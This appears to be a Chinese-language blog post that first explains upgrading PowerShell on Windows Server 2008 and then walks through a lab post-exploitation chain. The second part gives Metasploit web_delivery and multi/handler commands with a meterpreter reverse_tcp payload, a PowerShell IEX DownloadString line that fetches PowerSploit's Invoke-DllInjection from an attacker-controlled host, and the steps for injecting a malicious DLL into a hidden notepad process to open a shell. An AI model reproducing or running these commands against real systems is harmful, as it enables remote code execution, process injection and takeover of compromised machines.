zoukankan      html  css  js  c++  java
  • PowerShell的使用

     
     
     
     
     
     

    一:基于winserver2008版本powershell2.0的升级(至4.0)

    (1)首先:查看各版本的Powershell版本,如下所示

    (2)打开虚拟机winserver2008,在cmd或是“运行”窗口输入powershell进入powershell终端,使用命令:Get-Host或者$PSVersionTable.PSVERSION查看当前的PowerShell脚本

    (3)上图我的powershell进行了升级操作的,当然,升级也特别简单,只要下载两个东西进行安装就好,一个是dotNetFx45_Full_setup,Windows6.1-KB2819745-x64-MultiPkg,依次进行安装,先安装:dotNetFx45_Full_setup   ;再安装: Windows6.1-KB2819745-x64-MultiPkg   在安装完  Windows6.1-KB2819745-x64-MultiPkg  后,需要重启电脑才行。(注:注意下载时应该对应自己的winserver2008的位数,我的是x64位

                                                                     

    附上我百度云的资源链接:

    链接:https://pan.baidu.com/s/1tuai0g9s6bGnqzklAutIpQ         (Windows6.1-KB2819745-x64-MultiPkg )
    提取码:cd7y

    链接:https://pan.baidu.com/s/1kNpDkOxZTbFwhaWehL1zew        (dotNetFx45_Full_setup)
    提取码:rh2y

    二:使用模块与powershell的反弹shell至msf

    注:操作的机器仍为上述已升级的winsever2008(nat),以及kali(nat)kali的IP:192.168.172.167

    (1)首先,假设我们已经对这台服务器进行了getshell,并已经是管理员权限,那现在我们可以开始使用powershell进行各种操作,首先从反弹shell开始

    使用msf的exp:

    use exploit/multi/script/web_delivery 

     

    (2)在show options时会自带python的payload,这里不用进行修改,就使用这个payload就好,8080作为服务器winserver2008的服务,而8008作为监听的端口

    (3)然后设置本机的监听端口为8008,可以看到,已成功设置好监听端口为8008

    (4)在本地的powershell窗口内,外部导入自己的Powersploit的模块进行,这里我首先说明一下,其实过程类似于,使用powershell将生成的test.dll恶意链接木马绑定于一个本机的可执行程序上,然后在msf内反弹shell

    那知道了流程我们就开始动手操作吧。

    a:在powershell内导入Invoke-DllInjection.ps1 

    IEX (New-Object Net.WebClient).DownloadString("http://192.168.11.136/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

    注:http://192.168.11.136为自己本机,把PowerSploit放在www目录下

     b:开启一个隐藏进程并注入dll

    Start-Process c:windowssystem32 otepad.exe -WindowStyle Hidden

    c:查看此进程的id

    Get-Process notepad

     

     d:将生成的恶意dl绑定至这个进程

    Invoke-DllInjection -ProcessID 1256 -Dll . est.dll   (test.dll 放置在这个目录)

    注:这里我尝试用他自己本机已开Id并无法成功,而使用自己隐藏的2313的Id就成功了!!!!!!!!!!!

    e:修改metersploit监听设置并启动

    >use exploit/multi/handler

    >set Payload windows/x64/meterpreter/reverse_tcp

    >set LHOST 192.168.172.163   (你的kali的IP)

    >set LPORT 10086   (监听的端口为你生成的恶意dll文件监听的lport端口)

    >run

     

    注:这个监听端口千万不要设置错了,一定要设置为自己制作的恶意dll监听的当地端口!!!!!!!!

    很好,session会话就过来了!还能查看当前的用户

  • 相关阅读:
    多态_python的小窝_百度空间
    可直接下载空间客户端
    简明 Python 教程 / 面向对象的编程 / 类与对象的方法
    C++ 基础 woaidongmao C++博客 good 量产
    set has enumerate
    python invoke super parent method
    分享:常用汉字的unicode 编码
    数据库调整也可以遵循“开闭原则”
    Ninject超轻量级的依赖注入工具
    点某个链接进网站,会发这个链接的会员加积分,实现方法(有时间限制)
  • 原文地址:https://www.cnblogs.com/cute-puli/p/11229723.html
Copyright © 2011-2022 走看看